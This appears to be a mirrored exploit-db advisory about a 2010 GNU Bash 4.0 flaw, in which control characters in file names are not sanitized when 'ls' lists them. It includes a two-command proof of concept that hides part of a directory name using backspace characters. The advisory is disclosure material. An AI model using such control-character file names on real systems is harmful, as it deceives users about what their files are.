GNU Bash 4.0 – ‘ls’ Control Character Command Injection

  • 作者: Eric Piel
    日期: 2010-01-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33508/
  • source: https://www.securityfocus.com/bid/37776/info
    
    GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command.
    
    Attackers can exploit this issue to execute arbitrary commands in a bash terminal; other attacks may also be possible. 
    
    The following example is available:
    
    1. mkdir $(echo -e 'couc\x08\x08asd')
    2. ls
    
    Displays:
    coasd/
    
    Expected:
    couc??asd/